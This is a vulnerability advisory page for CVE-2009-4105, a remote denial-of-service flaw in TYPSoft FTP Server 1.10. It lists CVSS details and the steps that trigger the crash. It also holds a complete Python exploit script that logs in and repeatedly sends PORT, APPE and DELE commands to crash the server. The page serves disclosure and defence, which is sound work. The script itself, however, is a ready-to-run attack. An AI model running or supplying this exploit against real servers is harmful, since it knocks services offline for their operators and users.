TYPSoft FTP Server 1.10 Remote DoS Vulnerabilities

2009-11-30 / 2009-12-01
Credit: leinakesi
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-4105
CWE: CWE-20


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Date of Discovery: 24-Nov-2009 Credits:leinakesi[at]gmail.com Vendor: TYPSoft Affected: TYPSoft FTP Server Version 1.10 Earlier versions may also be affected Overview: TYPSoft FTP Server is an easy use FTP server Application. Denial of Service vulnerability exists in TYPSoft FTP Server when "APPE" and "DELE" commands are used in the same socket connection. Details: If you could log on the server successfully, take the following steps and the ftp server will crash which would lead to Denial of Service attack: 1.sock.connect((hostname, 21)) 2.sock.send("user %s\r\n" %username) 3.sock.send("pass %s\r\n" %passwd) 4.sock.send("PORT 127,0,0,1,122,107\r\n") 5.sock.send("APPE "+ test_string +"\r\n") 6.sock.send("DELE "+ test_string +"\r\n") 7.sock.close() Severity: High Exploit example: #!/usr/bin/python import socket import sys import time def Usage(): print ("Usage: ./expl.py <local_ip> <serv_ip> <Username> <password>\n") print ("Example:./expl.py 127.0.0.1 127.0.0.1 anonymous anonymous\n") print ("Example:./expl.py 192.168.48.183 192.168.48.111 anonymous anonymous\n") if len(sys.argv) <> 5: Usage() sys.exit(1) else: local=sys.argv[1] hostname=sys.argv[2] username=sys.argv[3] passwd=sys.argv[4] test_string="a"*30 ip_every=local.split('.') for i in range(1,10000): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((hostname, 21)) except: print ("Connection error!") sys.exit(1) r=sock.recv(1024) print "[+] "+ r sock.send("user %s\r\n" %username) print "[-] "+ ("user %s\r\n" %username) r=sock.recv(1024) print "[+] "+ r sock.send("pass %s\r\n" %passwd) print "[-] "+ ("pass %s\r\n" %passwd) r=sock.recv(1024) print "[+] "+ r sock_data.bind((local,31339)) sock_data.listen(1) sock.send("PORT " + ip_every[0] +","+ ip_every[1] +","+ ip_every[2] +"," + ip_every[3] + ",122,107\r\n") print "[-] "+ ("PORT " + local + "122,107\r\n") r=sock.recv(1024) print "[+] "+ r sock.send("APPE "+ test_string +"\r\n") print "[-] "+ ("APPE "+ test_string +"\r\n") r=sock.recv(1024) print "[+] "+ r sock.send("DELE "+ test_string +"\r\n") print "[-] "+ ("DELE "+ test_string +"\r\n") r=sock.recv(1024) print "[+] "+ r sock.close() sock_data.close() time.sleep(2) sys.exit(0);

References:

http://xforce.iss.net/xforce/xfdb/54407
http://www.securitytracker.com/id?1023234
http://www.securityfocus.com/bid/37114
http://www.securityfocus.com/archive/1/archive/1/508048/100/0/threaded


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top